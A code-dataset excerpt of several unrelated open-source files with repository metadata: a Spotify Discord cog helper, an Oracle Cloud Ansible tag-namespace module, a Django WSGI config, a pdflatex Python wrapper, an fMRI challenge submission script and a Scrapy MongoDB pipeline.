spotify/helpers.py
|
mina9999/Trusty-cogs
|
a47de7c233f3c1802effd29f4a86f8a9b0e2b34a
|
[
"MIT"
] | 221
|
2017-04-02T00:26:08.000Z
|
2022-03-26T15:06:54.000Z
|
import datetime
import logging
import re
from typing import Final, List, Pattern, Union
import tekore
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
from redbot.core import commands
from redbot.core.i18n import Translator
from redbot.core.utils.chat_formatting import humanize_timedelta
from tabulate import tabulate
log = logging.getLogger("red.trusty-cogs.spotify")
SPOTIFY_RE = re.compile(
r"(https?:\/\/open\.spotify\.com\/|spotify:?)(track|playlist|album|artist|episode|show)\/?:?([^?\(\)\s]+)"
)
SPOTIFY_LOGO = "https://imgur.com/Ig4VuuJ.png"
_RE_TIME_CONVERTER: Final[Pattern] = re.compile(r"(?:(\d+):)?([0-5]?[0-9]):([0-5][0-9])")
_ = Translator("Spotify", __file__)
REPEAT_STATES = {
"context": "\N{CLOCKWISE RIGHTWARDS AND LEFTWARDS OPEN CIRCLE ARROWS}",
"track": "\N{CLOCKWISE RIGHTWARDS AND LEFTWARDS OPEN CIRCLE ARROWS WITH CIRCLED ONE OVERLAY}",
"off": "",
}
PITCH = {
0: "C ",
1: "C♯, D♭",
2: "D",
3: "D♯, E♭",
4: "E",
5: "F",
6: "F♯, G♭",
7: "G",
8: "G♯, A♭",
9: "A",
10: "A♯, B♭",
11: "B",
"t": "A♯, B♭",
"A": "A♯, B♭",
"e": "B",
"B": "B",
}
MODE = {
0: "minor",
1: "Major",
}
VALID_RECOMMENDATIONS = {
"acousticness": lambda x: max(min(1.0, x / 100), 0.0),
"danceability": lambda x: max(min(1.0, x / 100), 0.0),
"duration_ms": lambda x: int(x),
"energy": lambda x: max(min(1.0, x / 100), 0.0),
"instrumentalness": lambda x: max(min(1.0, x / 100), 0.0),
"key": lambda x: max(min(11, x), 0),
"liveness": lambda x: max(min(1.0, x / 100), 0.0),
"loudness": lambda x: max(min(0.0, x), -60.0),
"mode": lambda x: 1 if x.lower() == "major" else 0,
"popularity": lambda x: max(min(100, x), 0),
"speechiness": lambda x: max(min(1.0, x / 100), 0.0),
"tempo": lambda x: float(x),
"time_signature": lambda x: int(x),
"valence": lambda x: max(min(1.0, x / 100), 0.0),
}
class SpotifyError(Exception):
pass
class NotPlaying(SpotifyError):
pass
class InvalidEmoji(SpotifyError):
pass
def time_convert(length: Union[int, str]) -> int:
if isinstance(length, int):
return length
match = _RE_TIME_CONVERTER.match(length)
if match is not None:
hr = int(match.group(1)) if match.group(1) else 0
mn = int(match.group(2)) if match.group(2) else 0
sec = int(match.group(3)) if match.group(3) else 0
pos = sec + (mn * 60) + (hr * 3600)
return pos
else:
try:
return int(length)
except ValueError:
return 0
async def make_details(track: tekore.model.FullTrack, details: tekore.model.AudioFeatures) -> str:
"""
{
"duration_ms" : 255349,
"key" : 5,
"mode" : 0,
"time_signature" : 4,
"acousticness" : 0.514,
"danceability" : 0.735,
"energy" : 0.578,
"instrumentalness" : 0.0902,
"liveness" : 0.159,
"loudness" : -11.840,
"speechiness" : 0.0461,
"valence" : 0.624,
"tempo" : 98.002,
"id" : "06AKEBrKUckW0KREUWRnvT",
"uri" : "spotify:track:06AKEBrKUckW0KREUWRnvT",
"track_href" : "https://api.spotify.com/v1/tracks/06AKEBrKUckW0KREUWRnvT",
"analysis_url" : "https://api.spotify.com/v1/audio-analysis/06AKEBrKUckW0KREUWRnvT",
"type" : "audio_features"
}
"""
attrs = [
"duration_ms",
"key",
"mode",
"time_signature",
"acousticness",
"danceability",
"energy",
"instrumentalness",
"liveness",
"speechiness",
"valence",
"loudness",
"tempo",
]
ls = []
ls.append(("Explicit", track.explicit))
ls.append(("Popularity", f"[ {track.popularity} ]"))
track_num = getattr(track, "track_number", "None")
ls.append(("Track", f"[ {track_num} ]"))
for attr in attrs:
friendly_name = attr.replace("_", " ").title()
detail = getattr(details, attr)
if attr == "duration_ms":
detail = humanize_timedelta(seconds=int(detail) / 1000)
ls.append(("Duration", detail))
continue
if attr == "key":
detail = PITCH[detail]
if attr == "mode":
detail = MODE[detail]
if attr == "loudness":
detail = f"[ {detail} dB ]"
if attr == "tempo":
detail = f"[ {detail} BPM ]"
if attr == "time_signature":
detail = f"[ {detail}/4 ]"
if isinstance(detail, int):
detail = f"[ {detail} ]"
if isinstance(detail, float):
detail = f"[ {round(detail * 100)}% ]"
ls.append((friendly_name, detail))
return tabulate(ls, headers=["Detail", "Info"], tablefmt="pretty")
def _draw_play(song: tekore.model.CurrentlyPlayingContext) -> str:
"""
Courtesy of aikaterna from Audio in red and away cog
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/audio/core/utilities/formatting.py#L358-L376
"""
song_start_time = datetime.datetime.utcfromtimestamp(song.timestamp / 1000)
end_time = datetime.datetime.utcfromtimestamp((song.timestamp + song.item.duration_ms) / 1000)
total_time = end_time - song_start_time
current_time = datetime.datetime.utcnow()
elapsed_time = current_time - song_start_time
sections = 12
loc_time = round((elapsed_time / total_time) * sections) # 10 sections
bar_char = "\N{BOX DRAWINGS HEAVY HORIZONTAL}"
seek_char = "\N{RADIO BUTTON}"
play_char = "\N{BLACK RIGHT-POINTING TRIANGLE}"
msg = "\n" + play_char + " "
for i in range(sections):
if i == loc_time:
msg += seek_char
else:
msg += bar_char
msg += " `{:.7}`/`{:.7}`".format(str(elapsed_time), str(total_time))
return msg
class SearchTypes(Converter):
"""
This ensures that when using the search function we get a valid search type
"""
async def convert(self, ctx: commands.Context, argument: str) -> str:
valid_types = [
"artist",
"album",
"episode",
"playlist",
"show",
"track",
]
find = argument.lower()
if find not in valid_types:
raise BadArgument(_("{argument} is not a valid genre.").format(argument=argument))
return find
class ScopeConverter(Converter):
"""
This ensures that when using the search function we get a valid search type
"""
async def convert(self, ctx: commands.Context, argument: str) -> str:
valid_types = [
"user-read-private",
"user-top-read",
"user-read-recently-played",
"user-follow-read",
"user-library-read",
"user-read-currently-playing",
"user-read-playback-state",
"user-read-playback-position",
"playlist-read-collaborative",
"playlist-read-private",
"user-follow-modify",
"user-library-modify",
"user-modify-playback-state",
"playlist-modify-public",
"playlist-modify-private",
"ugc-image-upload",
]
find = argument.lower()
if find not in valid_types:
raise BadArgument(_("{argument} is not a valid scope.").format(argument=argument))
return find
class RecommendationsConverter(Converter):
"""
This ensures that we are using valid genres
"""
async def convert(self, ctx: commands.Context, argument: str) -> dict:
query = {}
argument = argument.replace("🧑🎨", ":artist:")
# because discord will replace this in URI's automatically 🙄
rec_str = r"|".join(i for i in VALID_RECOMMENDATIONS.keys())
find_rec = re.compile(fr"({rec_str})\W(.+)", flags=re.I)
if not ctx.cog.GENRES:
try:
ctx.cog.GENRES = await ctx.cog._spotify_client.recommendation_genre_seeds()
except Exception:
raise BadArgument(
_(
"The bot owner needs to set their Spotify credentials "
"before this command can be used."
" See `{prefix}spotify set creds` for more details."
).format(prefix=ctx.clean_prefix)
)
genre_str = r"|".join(i for i in ctx.cog.GENRES)
find_genre = re.compile(fr"\b({genre_str})\b", flags=re.I)
find_extra = find_rec.finditer(argument)
genres = list(find_genre.findall(argument))
song_data = SPOTIFY_RE.finditer(argument)
tracks: List[str] = []
artists: List[str] = []
if song_data:
for match in song_data:
if match.group(2) == "track":
tracks.append(match.group(3))
if match.group(2) == "artist":
artists.append(match.group(3))
query = {
"artist_ids": artists if artists else None,
"genres": genres if genres else None,
"track_ids": tracks if tracks else None,
"limit": 100,
"market": "from_token",
}
for match in find_extra:
try:
num_or_str = match.group(2).isdigit()
if num_or_str:
result = VALID_RECOMMENDATIONS[match.group(1)](int(match.group(2)))
else:
result = VALID_RECOMMENDATIONS[match.group(1)](match.group(2))
query[f"target_{match.group(1)}"] = result
except Exception:
log.exception("cannot match")
continue
if not any([query[k] for k in ["artist_ids", "genres", "track_ids"]]):
raise BadArgument(
_("You must provide either an artist or track seed or a genre for this to work")
)
return query
class SpotifyURIConverter(Converter):
"""
Ensures that the argument is a valid spotify URL or URI
"""
async def convert(self, ctx: commands.Context, argument: str) -> re.Match:
match = SPOTIFY_RE.match(argument)
if not match:
raise BadArgument(
_("{argument} is not a valid Spotify URL or URI.").format(argument=argument)
)
return match
| 32.241486
| 123
| 0.565489
|
a2e49ad630e3adb49acfa1c804959f1ec354c34b
| 15,712
|
py
|
Python
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 108
|
2020-05-19T20:46:10.000Z
|
2022-03-25T14:10:01.000Z
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 90
|
2020-06-14T22:07:11.000Z
|
2022-03-07T05:40:29.000Z
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 42
|
2020-08-30T23:09:12.000Z
|
2022-03-25T16:58:01.000Z
|
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_tag_namespace
short_description: Manage a TagNamespace resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a TagNamespace resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new tag namespace in the specified compartment.
- You must specify the compartment ID in the request object (remember that the tenancy is simply the root
compartment).
- "You must also specify a *name* for the namespace, which must be unique across all namespaces in your tenancy
and cannot be changed. The name can contain any ASCII character except the space (_) or period (.).
Names are case insensitive. That means, for example, \\"myNamespace\\" and \\"mynamespace\\" are not allowed
in the same tenancy. Once you created a namespace, you cannot change the name.
If you specify a name that's already in use in the tenancy, a 409 error is returned."
- "You must also specify a *description* for the namespace.
It does not have to be unique, and you can change it with
L(UpdateTagNamespace,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/identity/latest/TagNamespace/UpdateTagNamespace)."
- "This resource has the following action operations in the M(oracle.oci.oci_identity_tag_namespace_actions) module: cascade_delete, change_compartment."
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The OCID of the tenancy containing the tag namespace.
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
name:
description:
- The name you assign to the tag namespace during creation. It must be unique across all tag namespaces in the tenancy and cannot be changed.
- Required for create using I(state=present).
- Required for update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
description:
description:
- The description you assign to the tag namespace during creation.
- Required for create using I(state=present).
- This parameter is updatable.
type: str
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
- This parameter is updatable.
type: dict
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
- This parameter is updatable.
type: dict
tag_namespace_id:
description:
- The OCID of the tag namespace.
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
is_retired:
description:
- Whether the tag namespace is retired.
See L(Retiring Key Definitions and Namespace Definitions,https://docs.cloud.oracle.com/Content/Identity/Concepts/taggingoverview.htm#Retiring).
- This parameter is updatable.
type: bool
state:
description:
- The state of the TagNamespace.
- Use I(state=present) to create or update a TagNamespace.
- Use I(state=absent) to delete a TagNamespace.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create tag_namespace
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
description: description_example
# optional
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
- name: Update tag_namespace
oci_identity_tag_namespace:
# required
tag_namespace_id: "ocid1.tagnamespace.oc1..xxxxxxEXAMPLExxxxxx"
# optional
description: description_example
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
is_retired: true
- name: Update tag_namespace using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
# optional
description: description_example
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
is_retired: true
- name: Delete tag_namespace
oci_identity_tag_namespace:
# required
tag_namespace_id: "ocid1.tagnamespace.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
- name: Delete tag_namespace using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
state: absent
"""
RETURN = """
tag_namespace:
description:
- Details of the TagNamespace resource acted upon by the current operation
returned: on success
type: complex
contains:
id:
description:
- The OCID of the tag namespace.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id:
description:
- The OCID of the compartment that contains the tag namespace.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name:
description:
- The name of the tag namespace. It must be unique across all tag namespaces in the tenancy and cannot be changed.
returned: on success
type: str
sample: name_example
description:
description:
- The description you assign to the tag namespace.
returned: on success
type: str
sample: description_example
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
is_retired:
description:
- Whether the tag namespace is retired.
See L(Retiring Key Definitions and Namespace
Definitions,https://docs.cloud.oracle.com/Content/Identity/Concepts/taggingoverview.htm#Retiring).
returned: on success
type: bool
sample: true
lifecycle_state:
description:
- The tagnamespace's current state. After creating a tagnamespace, make sure its `lifecycleState` is ACTIVE before using it. After retiring a
tagnamespace, make sure its `lifecycleState` is INACTIVE before using it.
returned: on success
type: str
sample: ACTIVE
time_created:
description:
- "Date and time the tagNamespace was created, in the format defined by RFC3339.
Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
sample: {
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"name": "name_example",
"description": "description_example",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"is_retired": true,
"lifecycle_state": "ACTIVE",
"time_created": "2013-10-20T19:20:30+01:00"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
from oci.identity.models import CreateTagNamespaceDetails
from oci.identity.models import UpdateTagNamespaceDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class TagNamespaceHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update, get, list and delete"""
def get_module_resource_id_param(self):
return "tag_namespace_id"
def get_module_resource_id(self):
return self.module.params.get("tag_namespace_id")
def get_get_fn(self):
return self.client.get_tag_namespace
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_tag_namespace,
tag_namespace_id=self.module.params.get("tag_namespace_id"),
)
def get_required_kwargs_for_list(self):
required_list_method_params = [
"compartment_id",
]
return dict(
(param, self.module.params[param]) for param in required_list_method_params
)
def get_optional_kwargs_for_list(self):
return dict()
def list_resources(self):
required_kwargs = self.get_required_kwargs_for_list()
optional_kwargs = self.get_optional_kwargs_for_list()
kwargs = oci_common_utils.merge_dicts(required_kwargs, optional_kwargs)
return oci_common_utils.list_all_resources(
self.client.list_tag_namespaces, **kwargs
)
def get_create_model_class(self):
return CreateTagNamespaceDetails
def create_resource(self):
create_details = self.get_create_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.create_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(create_tag_namespace_details=create_details,),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.CREATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.CREATE_OPERATION_KEY,
),
)
def get_update_model_class(self):
return UpdateTagNamespaceDetails
def update_resource(self):
update_details = self.get_update_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(
tag_namespace_id=self.module.params.get("tag_namespace_id"),
update_tag_namespace_details=update_details,
),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.UPDATE_OPERATION_KEY,
),
)
def delete_resource(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(
tag_namespace_id=self.module.params.get("tag_namespace_id"),
),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.DELETE_OPERATION_KEY,
),
)
TagNamespaceHelperCustom = get_custom_class("TagNamespaceHelperCustom")
class ResourceHelper(TagNamespaceHelperCustom, TagNamespaceHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=True, supports_wait=True
)
module_args.update(
dict(
compartment_id=dict(type="str"),
name=dict(type="str"),
description=dict(type="str"),
freeform_tags=dict(type="dict"),
defined_tags=dict(type="dict"),
tag_namespace_id=dict(aliases=["id"], type="str"),
is_retired=dict(type="bool"),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="tag_namespace",
service_client_class=IdentityClient,
namespace="identity",
)
result = dict(changed=False)
if resource_helper.is_delete_using_name():
result = resource_helper.delete_using_name()
elif resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update_using_name():
result = resource_helper.update_using_name()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_create():
result = resource_helper.create()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 39.28
| 157
| 0.663442
|
c18d141d8a8b8f636ae08f01330c3d8b13190b09
| 420
|
py
|
Python
|
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
"""
WSGI config for CompetitionManagement project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CompetitionManagement.settings")
application = get_wsgi_application()
| 24.705882
| 81
| 0.8
|
f3d36e5f05966d0164b842fcbad2c234bfaf647f
| 5,312
|
py
|
Python
|
.venv/lib/python3.6/site-packages/pdflatex/pdflatex.py
|
rguillon/mmrpg
|
94f06b8bb13d4a94caeed247d7ceb1675b785148
|
[
"MIT"
] | 3
|
2021-04-06T18:35:29.000Z
|
2021-05-17T21:35:46.000Z
|
venv/Lib/site-packages/pdflatex/pdflatex.py
|
l-Il/py-LaTeX
|
bd9dc79820fd569fce437f2316e73f40527adcdd
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pdflatex/pdflatex.py
|
l-Il/py-LaTeX
|
bd9dc79820fd569fce437f2316e73f40527adcdd
|
[
"MIT"
] | null | null | null |
import os
import shutil
import tempfile
import subprocess
from subprocess import PIPE
MODE_BATCH = 0
MODE_NON_STOP = 1
MODE_SCROLL = 2
MODE_ERROR_STOP = 3
INTERACTION_MODES = ['batchmode', 'nonstopmode', 'scrollmode', 'errorstopmode']
JINJA2_ENV = {'block_start_string': '\BLOCK{',
'block_end_string': '}',
'variable_start_string': '\VAR{',
'variable_end_string': '}',
'comment_start_string': '\#{',
'comment_end_string': '}',
'line_statement_prefix': '%%',
'line_comment_prefix': '%#',
'trim_blocks': True,
'autoescape': False}
class PDFLaTeX:
def __init__(self, latex_src, job_name: str):
self.latex = latex_src
self.job_name = job_name
self.interaction_mode = INTERACTION_MODES[MODE_BATCH]
self.dir = None
self.pdf_filename = None
self.params = dict()
self.pdf = None
self.log = None
@classmethod
def from_texfile(cls, filename):
prefix = os.path.basename(filename)
prefix = os.path.splitext(prefix)[0]
with open(filename, 'rb') as f:
return cls.from_binarystring(f.read(), prefix)
@classmethod
def from_binarystring(cls, binstr: str, jobname: str):
return cls(binstr, jobname)
@classmethod
def from_jinja_template(cls, jinja2_template, jobname: str = None, **render_kwargs):
tex_src = jinja2_template.render(**render_kwargs)
fn = jinja2_template.filename
if fn is None:
fn = jobname
if not fn:
raise ValueError("PDFLaTeX: if jinja template does not have attribute 'filename' set, "
"'jobname' must be provided")
return cls(tex_src, fn)
def create_pdf(self, keep_pdf_file: bool = False, keep_log_file: bool = False, env: dict = None):
if self.interaction_mode is not None:
self.add_args({'-interaction-mode': self.interaction_mode})
dir = self.params.get('-output-directory')
filename = self.params.get('-jobname')
if filename is None:
filename = self.job_name
if dir is None:
dir = ""
with tempfile.TemporaryDirectory() as td:
self.set_output_directory(td)
self.set_jobname('file')
args = self.get_run_args()
fp = subprocess.run(args, input=self.latex, env=env, timeout=15, stdout=PIPE, stderr=PIPE)
with open(os.path.join(td, 'file.pdf'), 'rb') as f:
self.pdf = f.read()
with open(os.path.join(td, 'file.log'), 'rb') as f:
self.log = f.read()
if keep_log_file:
shutil.move(os.path.join(td, 'file.log'), os.path.join(dir, filename + '.log'))
if keep_pdf_file:
shutil.move(os.path.join(td, 'file.pdf'), os.path.join(dir, filename + '.pdf'))
return self.pdf, self.log, fp
def get_run_args(self):
a = [k+('='+v if v is not None else '') for k, v in self.params.items()]
a.insert(0, 'pdflatex')
return a
def add_args(self, params: dict):
for k in params:
self.params[k] = params[k]
def del_args(self, params):
if isinstance(params, str):
params = [params]
if isinstance(params, dict) or isinstance(params, list):
for k in params:
if k in self.params.keys():
del self.params[k]
else:
raise ValueError('PDFLaTeX: del_cmd_params: parameter must be str, dict or list.')
def set_output_directory(self, dir: str = None):
self.generic_param_set('-output-directory', dir)
def set_jobname(self, jobname: str = None):
self.generic_param_set('-jobname', jobname)
def set_output_format(self, fmt: str = None):
if fmt and fmt not in ['pdf', 'dvi']:
raise ValueError("PDFLaTeX: Format must be either 'pdf' or 'dvi'.")
self.generic_param_set('-output-format', dir)
def generic_param_set(self, param_name, value):
if value is None:
if param_name in self.params.keys():
del self.params[param_name]
else:
self.params[param_name] = value
def set_pdf_filename(self, pdf_filename: str = None):
self.set_jobname(pdf_filename)
def set_batchmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_BATCH] if on else None
def set_nonstopmode(self, on: bool =True):
self.interaction_mode = INTERACTION_MODES[MODE_NON_STOP] if on else None
def set_scrollmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_SCROLL] if on else None
def set_errorstopmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_ERROR_STOP] if on else None
def set_interaction_mode(self, mode: int = None):
if mode is None:
self.interaction_mode = None
elif 0 <= mode <= 3:
self.interaction_mode = INTERACTION_MODES[mode]
else:
raise ValueError('PDFLaTeX: Invalid interaction mode!')
| 36.136054
| 103
| 0.591679
|
dda739530ece0c73edfe5bfd7d7ac8033097ad13
| 2,098
|
py
|
Python
|
prepare_submission.py
|
zivadinac/Algonauts2021_devkit
|
73fc6cda1903f73682ecad9245808e7b2750a9cc
|
[
"MIT"
] | 35
|
2021-05-01T02:58:03.000Z
|
2021-12-27T15:13:17.000Z
|
prepare_submission.py
|
antjak/Algonauts2021_devkit
|
aa5a677881c3d75b671065c683f63e0fad81bcdf
|
[
"MIT"
] | 2
|
2021-06-05T17:34:29.000Z
|
2021-06-22T20:36:19.000Z
|
prepare_submission.py
|
antjak/Algonauts2021_devkit
|
aa5a677881c3d75b671065c683f63e0fad81bcdf
|
[
"MIT"
] | 21
|
2021-05-06T04:59:09.000Z
|
2021-10-12T21:52:09.000Z
|
import numpy as np
import os
import glob
import random
import argparse
import itertools
import nibabel as nib
from nilearn import plotting
from tqdm import tqdm
from sklearn.cross_decomposition import PLSRegression
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.preprocessing import StandardScaler
import torch
import time
import pickle
import zipfile
from tqdm import tqdm
from utils.helper import save_dict,load_dict
def main():
parser = argparse.ArgumentParser(description='Prepares submission for Algonauts 2021')
parser.add_argument('-rd','--result_dir', help='contains predicted fMRI activity',default = './results/alexnet_devkit/layer_5', type=str)
parser.add_argument('-t','--track', help='mini_track for all ROIs, full_track for whole brain (WB)', default = 'mini_track', type=str)
args = vars(parser.parse_args())
track = args['track']
result_dir = args['result_dir']
if track == 'full_track':
ROIs = ['WB']
else:
ROIs = ['LOC','FFA','STS','EBA','PPA','V1','V2','V3','V4']
num_subs = 10
subs=[]
for s in range(num_subs):
subs.append('sub'+str(s+1).zfill(2))
results = {}
for ROI in ROIs:
ROI_results = {}
for sub in subs:
ROI_result_file = os.path.join(result_dir,track,sub,ROI+"_test.npy")
print("Result file path: ", ROI_result_file)
if not os.path.exists(ROI_result_file):
print("---------Warning : submission not ready ----------")
print("Result not found for ",sub, " and ROI: ",ROI)
print("Please check if the directory is correct or generate predicted data for ROI: ",ROI , " in subject: ", sub)
return
ROI_result = np.load(ROI_result_file)
ROI_results[sub] = ROI_result
results[ROI] = ROI_results
save_dict(results,track+".pkl")
zipped_results = zipfile.ZipFile(track+".zip", 'w')
zipped_results.write(track+".pkl")
zipped_results.close()
if __name__ == "__main__":
main()
| 33.301587
| 141
| 0.660153
|
6a3dbad2b90fea5a871e0ce14f80cb557307e73b
| 710
|
py
|
Python
|
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | 1
|
2019-04-24T00:39:28.000Z
|
2019-04-24T00:39:28.000Z
|
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | null | null | null |
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
from scrape.settings import mongo_host, mongo_port, \
mongo_user, mongo_passwd, \
mongo_db_name, mongo_db_collection
class ScrapePipeline(object):
def __init__(self):
client = pymongo.MongoClient("mongodb://%s:%s@%s:%d/admin" % (mongo_user, mongo_passwd, mongo_host, mongo_port))
db = client[mongo_db_name]
self.post = db[mongo_db_collection]
def process_item(self, item, spider):
data = dict(item)
self.post.insert(data)
return item
| 29.583333
| 120
| 0.692958
|
810aafb69459de120675e50ea2f995e957e9c1c3
| 973
|
py
|
Python
|
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
] | null | null | null |
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
